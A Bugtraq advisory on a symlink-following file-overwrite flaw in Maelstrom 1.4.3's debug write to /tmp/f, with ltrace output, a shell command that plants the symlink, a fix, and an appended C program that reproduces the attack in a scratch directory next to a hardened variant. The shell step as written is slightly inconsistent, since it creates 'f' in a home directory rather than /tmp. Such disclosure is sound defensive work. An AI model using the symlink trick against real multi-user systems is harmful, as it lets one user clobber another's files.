[23908] in bugtraq


Maelstrom 1.4.3 arbitrary file overwrite

daemon@ATHENA.MIT.EDU (Andrew Griffiths)
Sun Jan 20 17:14:34 2002

Date: Sun, 20 Jan 2002 20:16:30 +1100 (EST)
Message-Id: <200201200916.g0K9GUT13172@franklin.nt.tas.gov.au>
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-type: text/plain; charset=us-ascii

Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w")                              = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58)                                = 0

Which made me wonder if it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >  /tmp/bla; \
ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

Maelstrom opens the fixed, predictable path /tmp/f with fopen(..., "w"),
which follows symbolic links. Any local user who can write to /tmp can plant
/tmp/f as a symlink to a file of their choosing ahead of time; the next user
who runs Maelstrom then truncates that file and overwrites it with the string
"Main program = Maelstrom", with the permissions of the user who ran it. The
attacker cannot choose the content, but can clobber any file the victim is
allowed to write.

Of course, this won't work on systems that have linking restrictions in /tmp,
such as the Openwall kernel patch's refusal to follow symlinks in sticky,
world-writable directories when the link owner differs from the follower (on
current Linux kernels the same protection is the fs.protected_symlinks sysctl,
available since 3.6).

Fixing it
-=-=-=-=-

Remove the code that does the above; it is only a debug write and the program
does not need it. If a scratch file is genuinely required, do not use a fixed
name in a world-writable directory: create the file with
open(O_CREAT|O_EXCL|O_NOFOLLOW) or mkstemp() so that the open fails instead of
following a link that someone else planted, and prefer a directory under the
user's home over /tmp.


--
www.tasmail.com
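The following C program is an added example, not part of the original post or
of the Maelstrom source. It reproduces the problem in a scratch directory under
/tmp (created with mkdtemp, so the path is not predictable) instead of on the
real /tmp/f: a "victim" file is created, a symlink named f is pointed at it, and
the debug write from the ltrace output is replayed two ways. write_debug_unsafe
mirrors the fopen(..., "w") the advisory describes and goes straight through
the symlink; write_debug_safe is the hardened variant suggested in the "Fixing
it" section, using O_CREAT|O_EXCL|O_NOFOLLOW so that an existing path, symlink
or otherwise, makes the open fail and the target is left untouched. The
function names and the scratch-directory layout are this example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Unsafe: the same call ltrace showed. fopen(path, "w") follows a symlink
 * planted at path and truncates whatever it points to. */
static int write_debug_unsafe(const char *path)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fprintf(f, "Main program = %s\n", "Maelstrom");
    return fclose(f);
}

/* Safer: only write if we create the file ourselves. O_EXCL makes open()
 * fail with EEXIST when anything (including a symlink) already exists at
 * path; O_NOFOLLOW additionally refuses to follow a symlink (ELOOP). */
static int write_debug_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    FILE *f = fdopen(fd, "w");
    if (!f) { close(fd); return -1; }
    fprintf(f, "Main program = %s\n", "Maelstrom");
    return fclose(f);
}

/* Read the first line of path into buf; 0 on success, -1 on failure. */
static int read_first_line(const char *path, char *buf, size_t n)
{
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    int ok = fgets(buf, (int)n, f) != NULL;
    fclose(f);
    return ok ? 0 : -1;
}

/* Replay the attack in a private scratch directory (hypothetical layout:
 * <dir>/victim is the file to protect, <dir>/f is the attacker's symlink).
 * Returns 1 when the unsafe write clobbered the victim file through the link
 * AND the safe write refused and left it intact; 0 otherwise. */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/maelstrom-demo-XXXXXX";
    if (!mkdtemp(dir)) return 0;
    char target[256], link[256], line[64];
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/f", dir);

    /* The victim's file (constructed sample content). */
    FILE *v = fopen(target, "w");
    if (!v) { rmdir(dir); return 0; }
    fputs("precious data\n", v);
    fclose(v);

    /* The attacker plants the symlink at the predictable name. */
    int result = 0;
    if (symlink(target, link) == 0) {
        /* Step 1: unsafe write follows the link and overwrites the victim. */
        if (write_debug_unsafe(link) == 0 &&
            read_first_line(target, line, sizeof line) == 0 &&
            strcmp(line, "Main program = Maelstrom\n") == 0) {
            /* Restore the victim file, then try the hardened variant. */
            v = fopen(target, "w");
            if (v) { fputs("precious data\n", v); fclose(v); }
            /* Step 2: safe write must fail and leave the victim untouched. */
            if (write_debug_safe(link) == -1 &&
                read_first_line(target, line, sizeof line) == 0 &&
                strcmp(line, "precious data\n") == 0)
                result = 1;
        }
    }
    unlink(link); unlink(target); rmdir(dir);   /* clean up scratch dir */
    return result;
}

int main(void)
{
    printf("unsafe write clobbered target, safe write refused: %s\n",
           demo_symlink_attack() ? "yes" : "no");
    return 0;
}
```

Note that the O_EXCL check alone would also have stopped the attack here; the
reason to add O_NOFOLLOW as well is that it keeps the open from following a
link even when the caller has a legitimate reason to open an existing file
without O_EXCL. Neither flag helps if the attacker can race the creation of a
fixed name, which is why the real fix is to stop using a fixed name in /tmp.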